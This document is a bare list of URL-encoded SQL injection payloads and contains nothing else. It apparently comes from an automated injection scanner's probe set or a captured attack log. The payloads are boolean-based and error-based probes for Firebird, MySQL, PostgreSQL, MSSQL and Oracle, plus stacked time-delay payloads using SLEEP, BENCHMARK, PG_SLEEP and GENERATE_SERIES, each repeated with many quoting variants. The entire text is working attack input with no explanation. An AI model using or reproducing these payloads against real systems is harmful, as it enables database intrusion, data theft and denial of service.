-1787%22%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29 -5014%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%282556%3D2556 -8213%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%281397%3D1397 -2144%29%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%283263%3D3263 -6553%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29 -5991%27%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%27byEI%27%3D%27byEI -8568%27%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%27LCua%27%3D%27LCua -3076%27%29%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%28%27OOnc%27%3D%27OOnc -2790%27%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%27mTZa%27%3D%27mTZa -4359%27%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%27AHqD%27%20LIKE%20%27AHqD -1980%27%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%27Hboq%27%20LIKE%20%27Hboq -9512%27%29%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%28%27IsGX%27%20LIKE%20%27IsGX -8482%27%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%27mVJR%27%20LIKE%20%27mVJR -8701%22%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%22ZdiA%22%3D%22ZdiA -3465%22%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%22xSXy%22%3D%22xSXy -6578%22%29%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%28%22ZWUI%22%3D%22ZWUI -5697%22%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%22gCom%22%3D%22gCom -2574%22%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%22UZbg%22%20LIKE%20%22UZbg -8445%22%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%22GmYr%22%20LIKE%20%22GmYr -3659%22%29%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%28%22vmYE%22%20LIKE%20%22vmYE -9744%22%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%22FtjX%22%20LIKE%20%22FtjX -7472%25%27%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%27%25%27%3D%27 -2739%25%27%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%27%25%27%3D%27 -7574%25%27%29%29%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%28%27%25%27%3D%27 -2062%25%27%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%27%25%27%3D%27 -3455%00%27%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%27pPlA%27%3D%27pPlA -8944%00%27%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%27eEyL%27%3D%27eEyL -9695%27%29%20WHERE%201102%3D1102%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 -5341%22%29%20WHERE%207125%3D7125%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 -4110%29%20WHERE%201671%3D1671%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 -9410%27%20WHERE%209509%3D9509%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 -3623%22%20WHERE%205453%3D5453%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 -5272%20WHERE%205771%3D5771%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 %28SELECT%208954%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288954%3D8954%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 %28EXTRACTVALUE%282014%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282014%3D2014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29%29 %28UPDATEXML%283406%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283406%3D3406%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C9616%29%29 %28CAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285230%3D5230%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%29 %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288796%3D8796%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%29 %28SELECT%20CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289452%3D9452%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29 %28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283382%3D3382%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 %28SELECT%207801%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207801%20WHEN%207801%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%29 foo%2C%28SELECT%208003%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288003%3D8003%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%2CEXTRACTVALUE%286620%2CCONCAT%280x5c%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286620%3D6620%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 foo%2CUPDATEXML%285788%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285788%3D5788%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C1622%29 foo%2C%28CAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281191%3D1191%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%29 foo%2C%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282293%3D2293%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%29 foo%2C%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282376%3D2376%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 %28SELECT%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%284290%3D4290%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%29 %28SELECT%20%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289002%3D9002%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29 %28SELECT%20CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284757%3D4757%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29 %28SELECT%20CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281822%3D1822%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%20FROM%20DUAL%29 SELECT%20%27%3Axpc%3A%27%7C%7C%28SELECT%20%28CASE%20WHEN%20%282815%3D2815%29%20THEN%201%20ELSE%200%20END%29%29%7C%7C%27%3Aurs%3A%27 SELECT%20%27%3Axpc%3A%27%7C%7C%28CASE%203443%20WHEN%203443%20THEN%201%20ELSE%200%20END%29%7C%7C%27%3Aurs%3A%27%20FROM%20RDB%24DATABASE foo%29%3B%20SELECT%20SLEEP%285%29--%20 foo%27%29%3B%20SELECT%20SLEEP%285%29--%20 foo%27%3B%20SELECT%20SLEEP%285%29--%20 foo%22%3B%20SELECT%20SLEEP%285%29--%20 foo%29%3B%20SELECT%20SLEEP%285%29--%20 foo%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%3B%20SELECT%20SLEEP%285%29--%20 foo%27%29%3B%20SELECT%20SLEEP%285%29--%20 foo%27%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%27%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%27%3B%20SELECT%20SLEEP%285%29--%20 foo%27%29%3B%20SELECT%20SLEEP%285%29--%20 foo%27%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%27%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%27%3B%20SELECT%20SLEEP%285%29--%20 foo%22%29%3B%20SELECT%20SLEEP%285%29--%20 foo%22%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%22%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%22%3B%20SELECT%20SLEEP%285%29--%20 foo%22%29%3B%20SELECT%20SLEEP%285%29--%20 foo%22%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%22%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%22%3B%20SELECT%20SLEEP%285%29--%20 foo%25%27%29%3B%20SELECT%20SLEEP%285%29--%20 foo%25%27%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%25%27%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 foo%25%27%3B%20SELECT%20SLEEP%285%29--%20 foo%00%27%29%3B%20SELECT%20SLEEP%285%29--%20 foo%00%27%3B%20SELECT%20SLEEP%285%29--%20 foo%27%29%20WHERE%204313%3D4313%3B%20SELECT%20SLEEP%285%29--%20 foo%22%29%20WHERE%203578%3D3578%3B%20SELECT%20SLEEP%285%29--%20 foo%29%20WHERE%203897%3D3897%3B%20SELECT%20SLEEP%285%29--%20 foo%27%20WHERE%206087%3D6087%3B%20SELECT%20SLEEP%285%29--%20 foo%22%20WHERE%209515%3D9515%3B%20SELECT%20SLEEP%285%29--%20 foo%20WHERE%204015%3D4015%3B%20SELECT%20SLEEP%285%29--%20 foo%27%7C%7C%28SELECT%20%27WnNc%27%20FROM%20DUAL%20WHERE%207152%3D7152%3B%20SELECT%20SLEEP%285%29--%20 foo%27%7C%7C%28SELECT%20%27ZAwu%27%20WHERE%203594%3D3594%3B%20SELECT%20SLEEP%285%29--%20 foo%27%2B%28SELECT%20ybvm%20WHERE%205892%3D5892%3B%20SELECT%20SLEEP%285%29--%20 foo%27%2B%28SELECT%20%27GAtY%27%20WHERE%206557%3D6557%3B%20SELECT%20SLEEP%285%29--%20 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20SLEEP%285%29--%20 foo%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%25%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%25%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%25%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%25%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%00%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%00%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%29%20WHERE%202965%3D2965%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%22%29%20WHERE%201934%3D1934%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%29%20WHERE%207960%3D7960%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%20WHERE%209235%3D9235%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%22%20WHERE%208072%3D8072%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%20WHERE%204350%3D4350%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%7C%7C%28SELECT%20%27HSpu%27%20FROM%20DUAL%20WHERE%209086%3D9086%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%7C%7C%28SELECT%20%27DgmR%27%20WHERE%205365%3D5365%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%2B%28SELECT%20ORRh%20WHERE%207198%3D7198%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%2B%28SELECT%20%27FEAe%27%20WHERE%208722%3D8722%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x6d4c496a%29%29--%20 foo%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%3B%20SELECT%20PG_SLEEP%285%29-- foo%22%3B%20SELECT%20PG_SLEEP%285%29-- foo%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%3B%20SELECT%20PG_SLEEP%285%29-- foo%22%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%22%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%22%3B%20SELECT%20PG_SLEEP%285%29-- foo%22%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%22%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%22%3B%20SELECT%20PG_SLEEP%285%29-- foo%25%27%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%25%27%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%25%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%25%27%3B%20SELECT%20PG_SLEEP%285%29-- foo%00%27%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%00%27%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%29%20WHERE%203040%3D3040%3B%20SELECT%20PG_SLEEP%285%29-- foo%22%29%20WHERE%205183%3D5183%3B%20SELECT%20PG_SLEEP%285%29-- foo%29%20WHERE%205809%3D5809%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%20WHERE%201070%3D1070%3B%20SELECT%20PG_SLEEP%285%29-- foo%22%20WHERE%208643%3D8643%3B%20SELECT%20PG_SLEEP%285%29-- foo%20WHERE%203428%3D3428%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%7C%7C%28SELECT%20%27oiYr%27%20FROM%20DUAL%20WHERE%205159%3D5159%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%7C%7C%28SELECT%20%27cpos%27%20WHERE%201795%3D1795%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%2B%28SELECT%20Tdwf%20WHERE%205119%3D5119%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%2B%28SELECT%20%27sUCF%27%20WHERE%202345%3D2345%3B%20SELECT%20PG_SLEEP%285%29-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20PG_SLEEP%285%29-- foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 